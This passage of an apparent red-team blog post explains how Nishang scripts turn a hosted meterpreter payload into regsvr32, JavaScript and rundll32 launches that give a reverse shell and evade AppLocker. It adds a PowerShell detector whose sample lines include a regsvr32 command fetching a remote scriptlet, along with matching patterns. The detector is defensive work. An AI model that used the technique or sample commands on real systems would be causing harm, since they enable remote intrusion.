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" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><br /></div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: left;">
Usage with metasploit</h3>
<div style="text-align: justify;">
Some of the above scripts can be used to get a meterpreter session in the following ways:</div>
<br />
<div style="text-align: justify;">
<div style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;">
</div>
Create a PowerShell meterpreter payload using msfvenom:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSo05cf4f6mx22zkIA2YDaxkQEE8zYDILzKDWeJ87_3bQydhogicNAu0TWRitabUsnU72WFYXaeV4xafUsOQVDL05AmyDJma9KqTKQVquxjNspreoORSAnnw3l8RtVlqYL3Ls6aJbMWRM/s1600/msfpayload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSo05cf4f6mx22zkIA2YDaxkQEE8zYDILzKDWeJ87_3bQydhogicNAu0TWRitabUsnU72WFYXaeV4xafUsOQVDL05AmyDJma9KqTKQVquxjNspreoORSAnnw3l8RtVlqYL3Ls6aJbMWRM/s400/msfpayload.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Host the generated payload on a web server.<br />
<br />
<b>Using Out-SCT</b><br />
Pass the URL where the meterpreter PowerShell script is hosted to Out-SCT.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRrpKq0AGX79t_14qwEfQFZZlskiZ9Rkb4FzEAnhFoG8E_Ue3LthZm9hO9VBFEqZrJk6zURwy8audoUmU0J28kYtPj3IKJVADnHZ_mjACJqBgYWe7lhO11u8d0ccT10X-Zqn2-Lle5XkA/s1600/Out-SCT-meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRrpKq0AGX79t_14qwEfQFZZlskiZ9Rkb4FzEAnhFoG8E_Ue3LthZm9hO9VBFEqZrJk6zURwy8audoUmU0J28kYtPj3IKJVADnHZ_mjACJqBgYWe7lhO11u8d0ccT10X-Zqn2-Lle5XkA/s400/Out-SCT-meterpreter.png" width="400" /></a></div>
Now, host the generated SCT file on a web server. When the generated regsvr32 command is executed on a target, this will happen:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2EMH_yxU92j-nD4ajHQ4QGZA1kgWqnqO7fS_buUYh5sc_w8Stiqlv3Zu_Re_wbgmihDLWLrBJoNZFfu3PhJ04S3WtYsIuIC2h8jm9rySjBCepUo4P66BR3ndy6tpMp9TNwwbkg-HwRQ/s1600/sct-meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2EMH_yxU92j-nD4ajHQ4QGZA1kgWqnqO7fS_buUYh5sc_w8Stiqlv3Zu_Re_wbgmihDLWLrBJoNZFfu3PhJ04S3WtYsIuIC2h8jm9rySjBCepUo4P66BR3ndy6tpMp9TNwwbkg-HwRQ/s400/sct-meterpreter.png" width="400" /></a></div>
<br />
Awesome! A reverse HTTPS meterpreter from file-less execution, which also helps in avoiding AppLocker!<br />
<br />
<b>Using Out-JS</b><br />
Pass the URL to Out-JS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZf5UkZdRzpMVy-KWMNKEkXcQCug4hVnkE7NN2yVIU5ECLDfxNwB0rK2Cil6ZKsh2m-XKLN4nDtQ3zkxDksgXc8p2NF-r9lLhFp_ui_huQD_7AA5OavU6B400ZAxtlcZvQu49DrQCb7vE/s1600/Out-JS-meter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZf5UkZdRzpMVy-KWMNKEkXcQCug4hVnkE7NN2yVIU5ECLDfxNwB0rK2Cil6ZKsh2m-XKLN4nDtQ3zkxDksgXc8p2NF-r9lLhFp_ui_huQD_7AA5OavU6B400ZAxtlcZvQu49DrQCb7vE/s400/Out-JS-meter.png" width="400" /></a></div>
When the generated Style.js is executed on a target, we get a connect back in msfconsole!<br />
<br />
<b>Using Out-RundllCommand</b><br />
Pass the URL to Out-RundllCommand.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbDOLJuAFX_NGPX5QBkmwrG4prY1PLN2UbpiQ6qNQ8GvB_gvHgkKlZBun58mxjgXFlgOU0KNr8mjDU_TMyIbea2oizRP9d6Oqyo5EJzbDoIbTa7wLwivEV_wV-r-YoDcNZBfiQrGLGSPw/s1600/out-rundll-meter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbDOLJuAFX_NGPX5QBkmwrG4prY1PLN2UbpiQ6qNQ8GvB_gvHgkKlZBun58mxjgXFlgOU0KNr8mjDU_TMyIbea2oizRP9d6Oqyo5EJzbDoIbTa7wLwivEV_wV-r-YoDcNZBfiQrGLGSPw/s400/out-rundll-meter.png" width="400" /></a></div>
Once again, when the generated rundll32 command is executed on a target, a meterpreter session pops up in msfconsole.<br />
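For the blue side of the same picture, here is an added example that is not code from the original post or from Nishang: a PowerShell function that classifies process-creation command lines against the two launch patterns used above, regsvr32 pulling a remote scriptlet through scrobj.dll (the regsvr32 form the "Defenses against regsvr32" links below describe) and rundll32 being handed a javascript: URL instead of a DLL. The sample command lines are constructed, and the Get-SysmonCommandLine helper assumes a Sysmon deployment logging Event ID 1; neither is something the post describes.<br />

```powershell
# Added example, not part of the original post or Nishang. Sample command lines
# below are constructed; the Sysmon helper assumes Sysmon is installed and logging
# process creation (Event ID 1) to Microsoft-Windows-Sysmon/Operational.

function Test-ScriptletLaunch {
    # Classify one process command line. Returns an object with a Suspicious flag
    # and the matched reasons, so it can be piped to Where-Object or Export-Csv.
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [AllowEmptyString()]
        [string]$CommandLine
    )
    process {
        $reasons = @()

        # regsvr32 told to fetch a scriptlet over HTTP(S) and hand it to scrobj.dll
        if ($CommandLine -match '(?i)\bregsvr32(\.exe)?\b' -and
            $CommandLine -match '(?i)/i:\s*"?https?://' -and
            $CommandLine -match '(?i)\bscrobj\.dll\b') {
            $reasons += 'regsvr32 loading a remote scriptlet via scrobj.dll'
        }

        # rundll32 given a javascript: URL in place of a DLL and export name
        if ($CommandLine -match '(?i)\brundll32(\.exe)?\b' -and
            $CommandLine -match '(?i)javascript:') {
            $reasons += 'rundll32 executing an inline javascript: payload'
        }

        [pscustomobject]@{
            Suspicious  = ($reasons.Count -gt 0)
            Reasons     = ($reasons -join '; ')
            CommandLine = $CommandLine
        }
    }
}

function Get-SysmonCommandLine {
    # Extract the CommandLine field from Sysmon process-creation events
    # (assumption: Sysmon is deployed on the host being checked).
    param([int]$MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            ($x.Event.EventData.Data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        }
}

# Constructed sample lines: two ordinary administrative uses, two matching the patterns above.
$samples = @(
    'regsvr32.exe /s C:\Windows\System32\msxml6.dll',
    'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    'regsvr32.exe /s /n /u /i:http://example.invalid/UpdateCheck.sct scrobj.dll',
    'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "'
)

# Only the last two lines come back with Suspicious = True
$samples | Test-ScriptletLaunch | Format-Table Suspicious, Reasons -AutoSize

# Live use on a host with Sysmon:
# Get-SysmonCommandLine | Test-ScriptletLaunch | Where-Object Suspicious
```

The Security log carries the same CommandLine field in Event ID 4688 once "Include command line in process creation events" is enabled under the process creation audit policy, so Get-WinEvent can be pointed there instead of Sysmon. Detection complements, rather than replaces, blocking regsvr32 outright as the references below describe.<br />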
<br />
That is all for this post; all the scripts are available in the <a href="https://github.com/samratashok/nishang">GitHub repository of Nishang</a>. Hope you liked it. Please leave feedback and comments. <br />
<br /></div>
<div style="text-align: justify;">
<div style="text-align: justify;">
Join me for a two-day training<b> "Offensive PowerShell for Red and Blue Teams" at Shakacon, Honolulu (2 days - July 11th - 12th, 2016)</b> - <a href="https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/">https://www.shakacon.org/trainings/offensive-powershell-for-red-and-blue-teams-by-nikhil-mittal/</a></div>
</div>
<div style="text-align: justify;">
<br />
<br />
<br />
<b>References/Further Reading</b><br />
Casey and some of his work:<br />
<a href="https://twitter.com/subTee">https://twitter.com/subTee</a><br />
<a href="http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html">http://subt0x10.blogspot.in/2016/04/setting-up-homestead-in-enterprise-with.html</a><br />
<a href="https://github.com/subTee/SCTPersistence">https://github.com/subTee/SCTPersistence</a> <br />
<a href="https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302">https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302</a><br />
<br />
Detailed blog on JSRAT<br />
<a href="http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html">http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html</a><br />
<br />
Defenses against regsvr32:<br />
<a href="http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html">http://www.brimorlabsblog.com/2016/04/very-quick-blog-post-on-squiblydoo.html</a><br />
